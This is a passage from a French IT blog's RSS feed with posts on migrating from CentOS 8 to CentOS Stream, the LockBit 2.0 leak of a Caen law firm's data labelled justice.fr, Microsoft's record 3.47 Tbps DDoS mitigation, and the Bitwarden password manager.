commencer, <strong>CentOS 6 a atteint l'EOL</strong> (End Of Life) le 30 novembre 2020. Donc, <strong>si vous avez des serveurs en production fonctionnant sous CentOS 6, envisagez de migrer vers CentOS 7</strong>.</em><br></li><li><em><strong><a href="https://www.centos.org/download/?ref=insys.fr">CentOS 7</a></strong> lui continuera à recevoir des <strong>mises à jour de support et de maintenance jusqu'au 30 juin 2024</strong>.</em><br></li><li><em><strong>CentOS 8</strong> continuera à recevoir des <strong>mises à jour jusqu'à la</strong> <strong>fin décembre 2021</strong>, date à laquelle les utilisateurs devront passer à <strong>CentOS Stream</strong>.</em></li></ul><p>La distribution <strong>CentOS 8 Stream</strong> recevra des mises à jour pendant toute la phase de support de RHEL. Et comme mentionné précédemment, <strong>CentOS 9 ne sera pas une reconstruction de <a href="https://www.redhat.com/en/blog/whats-new-rhel-90-beta?ref=insys.fr">RHEL 9</a></strong>, mais <strong><a href="https://blog.centos.org/2021/12/introducing-centos-stream-9/?ref=insys.fr">CentOS Stream 9</a></strong>.</p><h2 id="migrer-de-centos-linux-8-vers-centos"><br>Migrer de CentOS Linux 8 vers CentOS</h2><p>À moins que vous ne prévoyiez de rester sous <strong><a href="https://www.centos.org/download/?ref=insys.fr">CentOS 7</a></strong>, la seule façon de continuer à utiliser CentOS et de recevoir les mises à jour et ainsi de résoudre l'erreur "Failed to download metadata for repo 'appstream': Cannot prepare internal mirrorlist: No URLs in mirrorlist" est de <strong>migrer vers CentOS Stream</strong>. Cela peut être réalisé en suivant les étapes simples suivantes :</p><!--kg-card-begin: markdown--><pre><code>$ sudo  dnf install centos-release-stream
$ sudo  dnf swap centos-{linux,stream}-repos
$ sudo  dnf distro-sync
</code></pre>
<!--kg-card-end: markdown--><p><br>Cela entraînera la mise à jour de certains paquets et l'installation d'autres nouveaux paquets.</p><h2 id="que-nous-r%C3%A9serve-lavenir-une-alternative-rockylinux"><br>Que nous réserve l'avenir ? Une alternative RockyLinux ?</h2><p>Il est vrai que la fin abrupte de <strong>CentOS</strong> était une décision mal pensée qui verra les utilisateurs de <strong>CentOS</strong> se tourner vers d'autres distributions Linux fiables qui garantissent un degré de stabilité décent, comme <a href="https://fr.wikipedia.org/wiki/OpenSUSE?ref=insys.fr">OpenSUSE</a> ou <a href="https://fr.wikipedia.org/wiki/Debian?ref=insys.fr">Debian</a>.</p><p>De plus, malgré les assurances constantes de Red Hat, il semble que <strong>CentOS Stream sera la plate-forme bêta des futures versions de RHEL</strong>.</p><p>Dans une tournure intéressante, <a href="https://gmkurtzer.github.io/?ref=insys.fr">Gregory M. Kurtzer</a>, qui est le <strong>créateur original de CentOS</strong>, a exprimé sa désapprobation dans la direction que <strong>CentOS</strong> prend et travaille actuellement sur <strong>un fork de RHEL</strong> connu sous le nom de <strong><a href="https://rockylinux.org/?ref=insys.fr">RockyLinux</a> lancé il y a maintenant plus d'un an </strong>pour remplir le vide laissé. Il existe déjà un <a href="https://github.com/rocky-linux?ref=insys.fr">Github</a> pour le projet et il sera intéressant de voir comment il évoluera dans le temps.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ ? ALERTE - Une fuite de données hautement confidentielles publiée - justice.fr - LockBit 2.0 ]]></title>
                    <description><![CDATA[ Les données très confidentielles de la justice Française (justice.fr) provenant du groupe de cybercriminels (LockBit 2.0) ont été publiées, bien avant la date butoir, faute de rançon et de réponse. ]]></description>
                    <link>https://insys.fr/blog/alerte-lockbit-2-0-justice-fr-une-fuite-de-donnees-hautement-confidentielles-publiee/</link>
                    <guid isPermaLink="false">61f9d873636f1500617df145</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Wed, 02 Feb 2022 08:20:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-021137.png" medium="image"/>
                    <content:encoded><![CDATA[ <p><a href="https://insys.fr/blog/lockbit-2-0-sattaque-cette-fois-ci-au-ministere-de-la-justice-francaise/">Il y a quelques jours, le groupe LockBit 2.0 mettait en demeure le gouvernement de la justice Française</a> (<a href="https://justice.fr/?ref=insys.fr">justice.fr</a>) en demandant une rançon (le montant est à l'heure actuelle inconnu).<br><br>Les données devaient être publiées <strong>initialement <em>le 10 février 2022 à 11 h 20</em></strong>, mais le groupe de cybercriminels LockBit 2.0 n'ayant pas obtenus de réponse du gouvernement, ni le règlement de la rançon, a changé de stratégie très rapidement, les données ont donc étaient <strong><em>mis en ligne le 02 février 2022 à 01 h 00</em></strong>.</p><h2 id="qui-a-%C3%A9t%C3%A9-vraiment-cibl%C3%A9"><br>Qui a été vraiment ciblé ?</h2><p>Selon les données analysées, la fuite provient d'un cabinet d'avocats situé dans la ville de Caen dont nous n'évoquerons pas le nom pour des raisons bien évidentes. C'est en réalité un cabinet regroupant différents avocats associés<strong>.</strong></p><p>En revanche, nous n'avons pas établi de lien sur le fait que la fuite a été nommée "<strong>justice.fr</strong>" par le groupe LockBit puisque la cible semble bel et bien un serveur ou ordinateur du cabinet d'avocats.</p><p><strong>Le cabinet d'avocats n'était pas au courant jusqu'à ce matin, le Barreau de Caen suite à un appel a prévenu le cabinet, qui a de suite pris ses dispositions.</strong></p><h2 id="un-nombre-cons%C3%A9quent-de-donn%C3%A9es-publi%C3%A9es-et-tr%C3%A8s-confidentielles"><br>Un nombre conséquent de données publiées et très confidentielles</h2><p>Il y a plus de <strong>9000 fichiers publiés</strong> contenant des données / informations HAUTEMENT confidentielles et récentes </p><p>On y retrouve toutes sortes de fichiers : word, excel, pdf, fichiers audios, messages privés, photos... comme l'attestent ces captures d'écrans.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-024848-1.png" width="805" height="479" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-02-024848-1.png 600w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-024848-1.png 805w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-025505.png" width="805" height="485" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-02-025505.png 600w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-025505.png 805w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Un grand nombre de fichiers et dossiers divers, contenant des données confidentielles.</figcaption></figure><p></p><h2 id="les-types-de-donn%C3%A9es"><br>Les types de données</h2><p>Là est le problème, le cabinet d'avocat détenait évidemment de par son métier des données ultras confidentielles, elles étaient malheureusement mal protégées, le groupe LockBit a pu s'en emparer facilement.</p><h3 id="juridiques"><br>Juridiques</h3><p>Des centaines de fichiers couvrant des affaires en cours, affaires classées, conclusions de tribunaux, convocations judiciaires, des chefs d'accusation ; <br>Un grand nombre de dictées numériques (enregistrements vocaux de procès-verbaux) pouvant contenir des informations sur des affaires hautement confidentielles et bien plus...</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/FKjnZCBX0AALr5S-2.jpg" width="400" height="384" loading="lazy" alt></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-033502.png" width="810" height="482" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-02-033502.png 600w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-033502.png 810w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Convocation à avocat et fichiers PDF scannés contenant des informations sur les clients.</figcaption></figure><h3 id="personnelles-et-identitaires"><br>Personnelles et identitaires</h3><p>Des données sur les différents associés du cabinet et des clients : des photos personnelles - familiales, des contrats de travail, passeports, livret de famille, attestations CAF, RIB, crédits en cours, bulletins de salaire, impôts, carte grise, factures, en bref toute l'intimité des associés et des clients.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/FKjpOUvX0AAL8tp-2.jpg" width="1062" height="1514" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/FKjpOUvX0AAL8tp-2.jpg 600w, https://insys.fr/content/images/size/w1000/2022/02/FKjpOUvX0AAL8tp-2.jpg 1000w, https://insys.fr/content/images/2022/02/FKjpOUvX0AAL8tp-2.jpg 1062w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-032352-1.png" width="808" height="480" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-02-032352-1.png 600w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-032352-1.png 808w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Passeport et dossier contenant des contrats de travail.</figcaption></figure><h3 id="donn%C3%A9es-de-sant%C3%A9"><br>Données de santé</h3><p>Nous allons encore ici plus loin dans l'intimité, nous pouvons trouver aussi des données de santé sur les clients du cabinet, mais aussi les associés comme des arrêts de travail, feuilles de soins, probablement des constatations effectuées par des médecins, etc.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/FKjpOUuXsAogz-2-3.jpg" class="kg-image" alt loading="lazy" width="400" height="262"><figcaption>Document provenant de l'Assurance Maladie.</figcaption></figure><p></p><h3 id="identifiants-et-mots-de-passe"><br>Identifiants et mots de passe</h3><p>Nous constations ici une grande négligence en terme de sécurité, nous retrouvons de mots de passe en clair dans les fichiers, mais pas que, aussi des accès à des comptes en banque, des messageries, des espaces en ligne réservés aux avocats et bien plus malheureusement !</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-035522.png" class="kg-image" alt loading="lazy" width="808" height="484" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-02-035522.png 600w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-035522.png 808w" sizes="(min-width: 720px) 720px"><figcaption>Certains documents confidentiels piratés par le cabinet d'avocats de Caen comprennent des fichiers avec des mots de passe en clair. C'est une mauvaise pratique à bannir, mais malheureusement c'est encore trop répandue.</figcaption></figure><p></p><h2 id="une-n%C3%A9gligence-qui-se-paye-ch%C3%A8re"><br>Une négligence qui se paye chère</h2><p>Outre l'importance des données dans la nature, la réputation du cabinet est en jeu, il y avait clairement un problème au niveau de la sécurité des données, n'importe qui d'autre d'expérimenté aurait pu s'en emparer sans trop d'efforts. <br>Malheureusement, ils ne doivent pas être les seules, il est très important à notre époque d'avoir une stratégie de sécurité très poussée, car les attaques sont de plus en plus complexes et nombreuses, les données sont une mine d'or.<br><br>En espérant que les services publics tels que <a href="https://www.cnil.fr/?ref=insys.fr">CNIL</a> et <a href="https://www.ssi.gouv.fr/?ref=insys.fr">l'ANSSI</a> vont prendre vite contact avec le cabinet afin de résoudre au plus vite cette situation.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Microsoft repousse une attaque DDoS record de 3,47 Tbps contre les clients Azure ]]></title>
                    <description><![CDATA[ Microsoft a révélé cette semaine qu&#39;il avait repoussé un nombre record d&#39;attaques par déni de service distribué (DDoS) visant ses clients en 2021, dont une ayant dépassé 3,47 térabits par seconde (Tbps). ]]></description>
                    <link>https://insys.fr/blog/microsoft-a-attenue-une-attaque-ddos-record-de-3-47-tbps-contre-les-clients-azure/</link>
                    <guid isPermaLink="false">61f87b1a05f4ee00616b7269</guid>
                    <category><![CDATA[ Cloud ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Tue, 01 Feb 2022 09:00:00 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1607723619497-98a79f01ba90?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDZ8fGZpYmVyfGVufDB8fHx8MTY0MzY3NjI5Ng&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>Microsoft a révélé cette semaine qu'il avait repoussé un nombre record d'attaques par déni de service distribué (DDoS) visant ses clients en 2021, dont trois ont dépassé 2,4 térabits par seconde (Tbps).</p><p>L'une des attaques DDoS a eu lieu en novembre, ciblant un client Azure anonyme en Asie et a duré au total <strong>15 minutes</strong>. Il a atteint un débit maximal de<strong> 3,47 Tbps</strong> et un débit de paquets de <strong>340 millions de paquets par seconde</strong> (pps), ce qui en fait la plus grande attaque jamais signalée dans l'histoire.</p><p>"Il s'agissait d'une attaque distribuée <strong>provenant d'environ 10 000 sources </strong>et de plusieurs pays à travers le monde, dont <em>les États-Unis, la Chine, la Corée du Sud, la Russie, la Thaïlande, l'Inde, le Vietnam, l'Iran, l'Indonésie et Taïwan</em>", a déclaré <strong><a href="https://azure.microsoft.com/fr-fr/blog/author/alethea-toh/?ref=insys.fr">Alethea Toh</a></strong>, chef de produit d'Azure Networking.</p><h2 id="une-attaque-ddos"><br>Une attaque DDoS ?</h2><p><em>Les attaques DDoS se produisent lorsque plusieurs appareils compromis sont utilisés comme conduit pour submerger un serveur, un service ou un réseau ciblé avec un flot de trafic Internet dans le but de surcharger les systèmes et de perturber ses services réguliers.</em></p><h2 id="une-attaque-dune-quinzaine-de-minutes"><br>Une attaque d'une quinzaine de minutes</h2><p>En décembre, Microsoft a déclaré avoir bloqué deux autres attaques dépassant 2,5 Tbps, toutes deux visant des clients en Asie. La première des attaques était une attaque UDP de 3,25 Tbps, tandis que l'autre intrusion était une inondation UDP de 2,55 Tbps qui a duré un peu plus de cinq minutes.</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/ddos-1.jpg" width="728" height="336" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/ddos-1.jpg 600w, https://insys.fr/content/images/2022/02/ddos-1.jpg 728w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/ddos-2.jpg" width="728" height="436" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/ddos-2.jpg 600w, https://insys.fr/content/images/2022/02/ddos-2.jpg 728w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p>Le rapport intervient plus de trois mois après que le géant de la technologie a révélé qu'il avait agi pour atténuer une attaque DDoS de 2,4 Tbps en août 2021 ciblant un client européen. Parmi les autres attaques record précédentes, citons une attaque DDoS de 2,5 Tbps absorbée par Google en septembre 2017 et une attaque volumétrique de 2,3 Tbps visant Amazon Web Services en février 2020.</p><h2 id="de-plus-en-plus-dattaques-et-plus-longues"><br>De plus en plus d'attaques et plus longues</h2><p>Microsoft a déclaré avoir observé une augmentation des attaques de plus d'une heure au second semestre 2021, tandis que la proportion d'attaques de courte durée de 30 minutes ou moins est passée de 74% à 57%. Cela dit, les agressions de plus longue durée sont vécues comme une séquence de multiples attaques courtes et répétées en rafale.</p><p>La société a également déclaré avoir <strong>atténué en moyenne 1 955 attaques par jour</strong>, avec un maximum de 4 296 attaques enregistrées en une seule journée le 10 août 2021. Pour l'ensemble du S2 2021, pas moins de <strong>359 713 attaques uniques contre son infrastructure ont été bloquées</strong>, une <strong>augmentation de 43%</strong> par rapport au premier semestre 2021.</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/ed6fc745-b8e8-40b4-ab29-713e2df4ad55-2.png" width="1024" height="576" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/ed6fc745-b8e8-40b4-ab29-713e2df4ad55-2.png 600w, https://insys.fr/content/images/size/w1000/2022/02/ed6fc745-b8e8-40b4-ab29-713e2df4ad55-2.png 1000w, https://insys.fr/content/images/2022/02/ed6fc745-b8e8-40b4-ab29-713e2df4ad55-2.png 1024w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/fd74cc89-bfa7-443e-bc18-a046777fed12-1.png" width="1024" height="696" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/fd74cc89-bfa7-443e-bc18-a046777fed12-1.png 600w, https://insys.fr/content/images/size/w1000/2022/02/fd74cc89-bfa7-443e-bc18-a046777fed12-1.png 1000w, https://insys.fr/content/images/2022/02/fd74cc89-bfa7-443e-bc18-a046777fed12-1.png 1024w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p><em><strong>Microsoft assure toutefois que sa plateforme de protection DDoS Azure est capable d'évoluer pour absorber un volume maximal d'attaques par déni de service.</strong></em></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://azure.microsoft.com/fr-fr/services/ddos-protection/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Services Protection DDoS et Atténuation | Microsoft Azure</div><div class="kg-bookmark-description">Défendez-vous des attaques DDoS (Distributed Denial of Service) visant vos applications et votre réseau avec les services de protection et d’atténuation des risques intégrés à Azure.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://azurecomcdn.azureedge.net/cvt-2903ee2ea52df7b351f35f2ec877c23558c5ec87eaf9c5266294b55c0657e930/images/icon/live-tile/azure-310x310.png" alt=""><span class="kg-bookmark-author">Microsoft Azure</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://azurecomcdn.azureedge.net/cvt-2903ee2ea52df7b351f35f2ec877c23558c5ec87eaf9c5266294b55c0657e930/images/shared/social/azure-icon-250x250.png" alt=""></div></a></figure><h2 id="lindustrie-du-jeu-vid%C3%A9o-dans-le-top-des-secteurs-vis%C3%A9s-par-les-attaquants"><br>L'industrie du jeu vidéo dans le top des secteurs visés par les attaquants</h2><p>L'industrie du jeu est apparue comme le secteur le plus durement touché, suivi des institutions financières, des médias, des fournisseurs de services Internet (FAI), de la vente au détail et des entités de la chaîne d'approvisionnement. La plupart des organisations ciblées étaient situées <em>aux États-Unis, en Inde, en Asie de l'Est (Hong Kong), au Brésil, au Royaume-Uni, en Corée du Sud, au Japon, en Australie et aux Émirats arabes unis</em>.</p><h2 id="le-digital-acc%C3%A9l%C3%A8re-mais-les-attaques-aussi"><br>Le digital accélère mais les attaques aussi</h2><p>"Nous avons constaté une forte augmentation des attaques en Inde, passant de seulement 2% de toutes les attaques au premier semestre 2021 à la deuxième position avec 23% de toutes les attaques au second semestre 2021", a déclaré Toh. "Un autre facteur déterminant peut être que l'accélération de la transformation numérique, par exemple l'initiative "Digital India", a accru l'exposition globale de la région aux cyber-risques."</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Bitwarden, le gestionnaire de mots de passe open-source ]]></title>
                    <description><![CDATA[ Bitwarden est un gestionnaire de mots de passe gratuit - freemium et open source sous licence AGPL, qui permet de générer et de conserver des mots de passe de manière sécurisée. ]]></description>
                    <link>https://insys.fr/blog/bitwarden-le-gestionnaire-de-mots-de-passe-open-source/</link>
                    <guid isPermaLink="false">61f7ea6205f4ee00616b7005</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Mon, 31 Jan 2022 17:20:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/01/bitwarden-og.png" medium="image"/>
                    <content:encoded><![CDATA[ <p>Comme nous le savons tous, les mots de passe ne constituent pas une mesure de sécurité efficace, et la protection des données et des systèmes dans l'environnement moderne des menaces nécessite une protection renforcée. Voici quelques statistiques choquantes sur la cybersécurité :</p><ul><li>Il faut <strong>six mois</strong> pour détecter une violation de données.</li><li><strong>43 %</strong> de toutes les cyberattaques visent les petites entreprises.</li><li><strong>91%</strong> des attaques se lancent avec un e-mail de phishing.</li><li>Une entreprise est victime d'une attaque de ransomware toutes les <strong>14 secondes</strong>.</li><li><strong>38 %</strong> des pièces jointes malveillantes sont masquées par un type de fichier Microsoft Office ou un autre.</li><li>Les entreprises ont été confrontées en moyenne à <strong>22 failles de sécurité</strong> en 2020.</li><li>Le coût mondial de la cybercriminalité coûte désormais au monde entier près de <strong>600 milliards de dollars</strong>, soit 0,8 % du PNB mondial.<br><br></li></ul><h2 id="bitwarden-le-gestionnaire-de-mots-de-passe-ultime">Bitwarden le gestionnaire de mots de passe ultime ?</h2><p>Bitwarden offre le moyen le plus simple et le plus sûr pour les équipes et les individus de stocker et de partager des données sensibles à partir de n'importe quel appareil. Ces éléments sont protégés par un seul et unique mot de passe appelé « mot de passe maître ». Il est créé en 2016 par Kyle Spearrin et il est open source sous licence AGPL.</p><p>C'est notamment une alternative à de nombreux gestionnaires de mots de passe, comme KeePass, LastPass, Dashlane, 1Password et bien plus.</p><h3 id="caract%C3%A9ristiques-et-avantages-de-la-plateforme">Caractéristiques et avantages de la plateforme<br></h3><ul><li><strong>Partage de mot de passe sécurisé</strong><br><em>Partage de données chiffrées rapidement et facilement, et uniquement avec les utilisateurs ou les équipes qui ont besoin d'y accéder.</em><br><br></li><li><strong>Accessibilité multiplateforme</strong><br><em>Accès aux données critiques de votre coffre-fort Bitwarden depuis n'importe quel emplacement, navigateur et appareil (Google Chrome, Safari, Mozilla Firefox, Vivaldi, Opera, Brave, Microsoft Edge, Tor Browser, iOS, Android, Windows, MacOS et Linux).</em><br><br></li><li><strong>Basé sur le cloud ou auto-hébergé</strong><br><em>Opérationnel en quelques minutes dans le cloud ou vous pouvez auto-héberger Bitwarden pour un contrôle complet des données.</em><br><br></li><li><strong>Audit de sécurité et conformité</strong><br><em>Open source (<a href="https://github.com/bitwarden/server?ref=insys.fr">disponible sur GitHub</a>) et audité par un tiers, Bitwarden est conforme aux réglementations Privacy Shield, GDPR, CCPA.</em><br><br></li><li><strong>Rapports de santé du coffre-fort</strong><br><em>Accès à des rapports perspicaces pour révéler les mots de passe faibles et réutilisés et <a href="https://bitwarden.com/blog/vault-health-reports-released/?ref=insys.fr">d'autres mesures de sécurité des données utiles</a>.</em><br><br></li><li><strong>Synchronisation d'annuaire</strong><br><em>Un puissant connecteur d'annuaire rationalise l'intégration des utilisateurs et des groupes et les maintient synchronisés.</em><br><br></li><li><strong>Assistance permanente</strong><br><em>Agents Customer Success sont disponibles pour vous accompagner 24h/24.</em><br><br></li><li><strong>Journaux d'événements détaillés</strong><br>Bitwarden crée des pistes d'audit pour vous aider à suivre l'accès des utilisateurs et des groupes aux données sensibles.<br><br></li><li><strong>Intégrations flexibles</strong><br><em>Unissez vos systèmes existants avec Bitwarden à l'aide de l'intégration SSO, des services d'annuaire ou de puissantes API.</em><br><br></li></ul><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://bitwarden.com/products/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">The Bitwarden Password Manager | Bitwarden</div><div class="kg-bookmark-description">Open Source Password Management for You and Your Business</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://bitwarden.com/icons/icon-512x512.png?v&#x3D;1abf57d1154002a9fac426a2c5c04d85" alt=""><span class="kg-bookmark-author">Bitwarden</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://bitwarden.com/images/bitwarden-og.png" alt=""></div></a></figure><h3 id="quen-est-il-du-niveau-de-s%C3%A9curit%C3%A9"><br>Qu'en est-il du niveau de sécurité ?</h3><p>Bitwarden effectue régulièrement des audits de sécurité tiers et est conforme aux normes de sécurité Privacy Shield, HIPAA, GDPR, CCPA et SOC 2.</p><p>Il dispose aussi d'un chiffrement de bout en bout et permets donc de verrouiller vos mots de passe et vos informations privées avec un cryptage AES-256 bits de bout en bout, un hachage salé et PBKDF2 SHA-256.</p><p>Vous pouvez consulter les rapports à l'adresse ci-dessous :</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://bitwarden.com/blog/third-party-security-audit/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Bitwarden Completes Third-party Security Audit | Bitwarden Blog</div><div class="kg-bookmark-description">Bitwarden has completed a thorough security assessment, code audit, and cryptographic analysis from experts at a third-party security firm.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://bitwarden.com/icons/icon-512x512.png?v&#x3D;1abf57d1154002a9fac426a2c5c04d85" alt=""><span class="kg-bookmark-author">Bitwarden</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://images.ctfassets.net/7rncvj1f8mw7/2nBfBEtIxJOFd1dkMQiCe1/9706666b9d1255b27451864796ab6f2e/Bitwarden_Completes_Third-party_Security_Audit?w&#x3D;910&amp;h&#x3D;500&amp;fl&#x3D;progressive&amp;q&#x3D;50&amp;fm&#x3D;jpg" alt=""></div></a></figure><p>Être open source est l'une des principales caractéristiques de la plate-forme Bitwarden. Cela offre une transparence totale sur la solution et engage la communauté à aider à définir de nouvelles normes de sécurité plus élevées.</p><h3 id="facilit%C3%A9-dinstallation-avec-docker"><br>Facilité d'installation avec Docker</h3><p>Vous l'aurez donc compris, Bitwarden est disponible via leur service SaaS, mais vous pouvez également déployer la partie serveur sur votre propre machine (serveur ou NAS) si vous souhaitez contrôler vos données personnelles de bout en bout.</p><p>Si vous souhaitez l'installer sur votre propre serveur à l'aide de Docker, la documentation suivante est recommandée :</p><ul><li><a href="https://bitwarden.com/help/install-on-premise-linux/?ref=insys.fr">Installation Linux</a></li><li><a href="https://bitwarden.com/help/install-on-premise-windows/?ref=insys.fr">Installation Windows</a></li><li><a href="https://bitwarden.com/help/install-on-premise-manual/?ref=insys.fr">Installation manuel sans Docker</a>  </li></ul><p>Vous pouvez également retrouver toutes les configurations possibles à cette adresse :</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://bitwarden.com/help/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Help Center | Bitwarden Help &amp; Support</div><div class="kg-bookmark-description">The Bitwarden Help Center guides you on how to use a password manager, evaluating password manager capabilities, and answering the most frequently asked questions.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://bitwarden.com/icons/icon-512x512.png?v&#x3D;1abf57d1154002a9fac426a2c5c04d85" alt=""><span class="kg-bookmark-author">Bitwarden</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://bitwarden.com/images/bitwarden-og.png" alt=""></div></a></figure> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ LockBit 2.0 s&#x27;attaque cette fois-ci au ministère de la Justice Française ]]></title>
                    <description><![CDATA[ Le groupe de cybercriminels (LocktBit 2.0) annonce avoir piraté le ministère de la Justice Française et réclame une rançon, sans quoi ils publieront des données volées d’ici deux semaines. ]]></description>
                    <link>https://insys.fr/blog/lockbit-2-0-sattaque-cette-fois-ci-au-ministere-de-la-justice-francaise/</link>
                    <guid isPermaLink="false">61f3c8e42c028300617c89aa</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Fri, 28 Jan 2022 12:24:00 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1618060931775-18ed14951776?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDM1fHxoYWNraW5nfGVufDB8fHx8MTY0MzM2OTE2Mw&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>Mise à jour:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://insys.fr/blog/alerte-lockbit-2-0-justice-fr-une-fuite-de-donnees-hautement-confidentielles-publiee/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">? ALERTE - Une fuite de données hautement confidentielles publiée - justice.fr - LockBit 2.0</div><div class="kg-bookmark-description">Les données très confidentielles de la justice Française (justice.fr) provenant du groupe de cybercriminels (LockBit 2.0) ont été publiées, bien avant la date butoir, faute de rançon et de réponse.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://insys.fr/assets/manifest/icons/apple-touch-icon.png" alt=""><span class="kg-bookmark-author">INSYS</span><span class="kg-bookmark-publisher">INSYS</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-02-021137.png" alt=""></div></a></figure><p><br><br>Le groupe menant régulièrement des attaques dénommé « Lockbit », qui est déjà parvenu à dérober des données de Thales, Accenture ou encore Transdev, s’en est cette fois pris au ministère de la Justice Française.</p><p>Le groupe cybercriminel annoncent avoir piraté le ministère de la Justice Française (<a href="https://justice.fr/?ref=insys.fr">justice.fr</a>) et annonce un peu moins de 10 000 fichiers dérobés, sans en préciser la nature ni l'origine exacte.<br>Il réclame une rançon, sans celle-ci le groupe publiera les données volées d'ici deux semaines, très précisément <em>le 10 février 2022 à 11 h 20</em>, selon le message du groupe LockBit.<br><br></p><h2 id="des-sources-qui-confirment-les-faits">Des sources qui confirment les faits</h2><p><a href="https://www.lemagit.fr/actualites/252512561/LockBit-20-menace-de-divulguer-des-donnees-de-la-Justice-francaise?ref=insys.fr">Auprès du MagIT</a>, le ministère de la Justice confirme que 